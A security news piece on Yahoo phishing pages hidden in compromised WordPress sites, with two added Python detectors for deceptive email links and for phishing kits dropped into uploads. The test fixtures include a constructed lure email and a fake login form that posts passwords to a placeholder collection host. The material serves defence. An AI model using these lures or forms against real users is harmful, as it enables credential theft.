Yahoo phishing hides in compromised WordPress websites

Yahoo users have been targeted in a phishing attack that starts with an “avoid account deactivation” email. Hovering over the link reveals that it points to a non-Yahoo address – an easy way to know that something is amiss.

The phishing pages are very authentic looking. Once users have entered their login details (which are collected by the phisher), they are redirected to Yahoo Mail.
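The hover check described above can be automated on the mail-gateway side: extract every link from the HTML body and flag anchors whose visible text advertises one domain while the href points somewhere else, or whose destination is outside the domains the sender legitimately uses. The following is an added example (not Commtouch's code): the email body, the `photographer-blog.invalid` host and the `find_deceptive_links` function are all constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample of the lure: the visible link text looks like Yahoo, but the
# href points at a hidden page on an unrelated (placeholder) WordPress site.
SAMPLE_EMAIL_HTML = """
<p>Your account will be deactivated unless you confirm it now.</p>
<p><a href="http://photographer-blog.invalid/blog/wp-content/uploads/yahoo/login.html">
https://login.yahoo.com/account/verify</a></p>
<p><a href="https://help.yahoo.com/">Yahoo Help</a></p>
<p><a href="http://photographer-blog.invalid/blog/">Click here to confirm</a></p>
"""


class _AnchorCollector(HTMLParser):
    """Collect (visible text, href) pairs for every <a> element in the body."""

    def __init__(self):
        super().__init__()
        self.anchors = []
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href") or ""
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.anchors.append(("".join(self._text).strip(), self._href))
            self._href = None


def extract_anchors(html):
    parser = _AnchorCollector()
    parser.feed(html)
    parser.close()
    return parser.anchors


def registered_domain(host):
    # Simplification (assumption): treat the last two labels as the owning domain.
    # Good enough for .com-style names; a real tool would use the public suffix list.
    labels = host.lower().split(".")
    return ".".join(labels[-2:])


def find_deceptive_links(html, trusted_domains=("yahoo.com",)):
    """Return (shown text, href, reason) for every link a recipient should distrust."""
    findings = []
    for text, href in extract_anchors(html):
        href_domain = registered_domain(urlparse(href).hostname or "")
        # Case 1: the visible text is itself a URL, but it names a different domain
        # than the real destination (the classic hover-to-reveal mismatch).
        if text.lower().startswith(("http://", "https://")):
            shown_domain = registered_domain(urlparse(text).hostname or "")
            if shown_domain != href_domain:
                findings.append((text, href, "displayed URL and real destination differ"))
                continue
        # Case 2: the destination is not one of the sender's own domains at all.
        if href_domain not in trusted_domains:
            findings.append((text, href, "destination is outside the trusted domains"))
    return findings


if __name__ == "__main__":
    for shown, real, why in find_deceptive_links(SAMPLE_EMAIL_HTML):
        print(f"{why}: '{shown}' -> {real}")
```

Run against the constructed body, the lookalike Yahoo URL and the "Click here to confirm" link are both reported while the genuine help.yahoo.com link passes; the trusted-domain list is what makes the second rule useful, so it should be derived from the purported sender rather than hard-coded.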

A large number of compromised sites have been used to hide the phishing pages – all the samples collected by Commtouch Labs were based on WordPress. In such cases the phishers seek out a particular plugin with a known vulnerability that can be repeatedly exploited on many sites. In the example below a Romanian photographer’s website continues to function normally while the phishing page is hidden in the blog section.
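Because the compromised site keeps working normally, the owner rarely notices the phishing kit. A webmaster-side check that would have caught the pattern described above looks for two things: script or HTML files dropped into `wp-content/uploads/`, where WordPress should only store media, and password-collecting forms anywhere other than `wp-login.php`. This is an added example, not a Commtouch tool; the directory layout it scans is a constructed, simplified WordPress tree and `collector.invalid` is a placeholder host.

```python
import os
import re
import tempfile

# File types that have no business in the media uploads directory.
SUSPECT_EXTS = {".html", ".htm", ".php", ".phtml"}
# A form that asks for a password; expected in wp-login.php, suspicious elsewhere.
PASSWORD_FORM = re.compile(r"<form\b.*?type\s*=\s*['\"]?password", re.I | re.S)
LEGIT_PASSWORD_FORMS = {"wp-login.php"}


def scan_wordpress_tree(root):
    """Walk a WordPress install and return (relative_path, reason) for suspect files."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in sorted(files):
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            ext = os.path.splitext(name)[1].lower()
            if ext not in SUSPECT_EXTS:
                continue
            # Rule 1: uploads should hold images and documents, never pages or scripts.
            if rel.startswith("wp-content/uploads/"):
                findings.append((rel, "script or HTML page inside the uploads directory"))
                continue
            # Rule 2: a password form outside the real login page is a lookalike.
            if rel in LEGIT_PASSWORD_FORMS:
                continue
            with open(path, encoding="utf-8", errors="replace") as fh:
                if PASSWORD_FORM.search(fh.read()):
                    findings.append((rel, "password form outside wp-login.php"))
    return findings


def build_sample_tree():
    """Create a constructed, deliberately small WordPress layout for the demo."""
    root = tempfile.mkdtemp(prefix="wp-demo-")
    files = {
        "wp-login.php": "<form method='post'><input type='password' name='pwd'></form>",
        "wp-content/uploads/2014/03/photo.jpg": "not really a jpeg, just filler",
        # A phishing kit dropped beside the site's own uploads (constructed).
        "wp-content/uploads/yahoo/index.html":
            "<form action='http://collector.invalid/post.php' method='post'>"
            "<input name='login'><input type='password' name='passwd'></form>",
        "wp-content/plugins/gallery/gallery.php": "<?php echo 'gallery'; ?>",
        # A lookalike login page hidden in the theme folder (constructed).
        "wp-content/themes/photo/verify.php":
            "<html><form method='post'>Yahoo! <input type='password'></form></html>",
    }
    for rel, body in files.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(body)
    return root


if __name__ == "__main__":
    for rel, why in scan_wordpress_tree(build_sample_tree()):
        print(f"{why}: {rel}")
```

On the constructed tree the scanner reports the kit under `wp-content/uploads/yahoo/` and the hidden `verify.php`, and stays silent on the real login page, the plugin and the photo. Pairing this with a comparison against a known-good file manifest (or the plugin's upstream release) is what turns a one-off cleanup into a way of catching the next drop from the same vulnerable plugin.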